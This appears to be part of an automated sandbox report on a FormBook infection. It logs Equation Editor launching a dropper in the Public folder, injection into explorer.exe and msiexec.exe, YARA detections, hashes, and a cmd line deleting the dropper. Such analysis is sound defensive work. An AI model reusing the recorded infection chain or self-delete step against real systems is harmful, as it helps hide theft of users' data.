                                        General

                                        Start time:19:17:46
                                        Start date:02/12/2021
                                        Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                        Imagebase:0x400000
                                        File size:543304 bytes
                                        MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        Analysis Process: vbc.exe PID: 2556 Parent PID: 1160

                                        General

                                        Start time:19:17:49
                                        Start date:02/12/2021
                                        Path:C:\Users\Public\vbc.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\Public\vbc.exe"
                                        Imagebase:0x400000
                                        File size:513443 bytes
                                        MD5 hash:8E90E8E526BC80036BA6B50A913A1880
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.484497263.0000000001E90000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.484497263.0000000001E90000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.484497263.0000000001E90000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        Reputation:low

                                        Analysis Process: vbc.exe PID: 2080 Parent PID: 2556

                                        General

                                        Start time:19:17:52
                                        Start date:02/12/2021
                                        Path:C:\Users\Public\vbc.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\Public\vbc.exe"
                                        Imagebase:0x400000
                                        File size:513443 bytes
                                        MD5 hash:8E90E8E526BC80036BA6B50A913A1880
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.541290495.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.541290495.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.541290495.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000001.481627227.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000001.481627227.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000001.481627227.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.543081272.0000000002590000.00000040.00020000.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.543081272.0000000002590000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.543081272.0000000002590000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.480383682.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.480383682.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.480383682.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.481156695.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.481156695.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.481156695.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.541124552.00000000001C0000.00000040.00020000.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.541124552.00000000001C0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.541124552.00000000001C0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                        Reputation:low

                                        Analysis Process: explorer.exe PID: 1764 Parent PID: 2080

                                        General

                                        Start time:19:17:56
                                        Start date:02/12/2021
                                        Path:C:\Windows\explorer.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\Explorer.EXE
                                        Imagebase:0xffa10000
                                        File size:3229696 bytes
                                        MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.512689943.00000000097D3000.00000040.00020000.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.512689943.00000000097D3000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.512689943.00000000097D3000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.505045943.00000000097D3000.00000040.00020000.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.505045943.00000000097D3000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.505045943.00000000097D3000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                        Reputation:high

                                        Analysis Process: msiexec.exe PID: 2952 Parent PID: 1764

                                        General

                                        Start time:19:18:18
                                        Start date:02/12/2021
                                        Path:C:\Windows\SysWOW64\msiexec.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\msiexec.exe
                                        Imagebase:0x610000
                                        File size:73216 bytes
                                        MD5 hash:4315D6ECAE85024A0567DF2CB253B7B0
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.683120830.00000000003C0000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.683120830.00000000003C0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.683120830.00000000003C0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.682689101.00000000001E0000.00000040.00020000.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.682689101.00000000001E0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.682689101.00000000001E0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.682544135.0000000000090000.00000040.00020000.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.682544135.0000000000090000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.682544135.0000000000090000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                        Reputation:moderate

                                        Analysis Process: cmd.exe PID: 2032 Parent PID: 2952

                                        General

                                        Start time:19:18:22
                                        Start date:02/12/2021
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:/c del "C:\Users\Public\vbc.exe"
                                        Imagebase:0x49e40000
                                        File size:302592 bytes
                                        MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        Disassembly

                                        Code Analysis

                                        Reset < >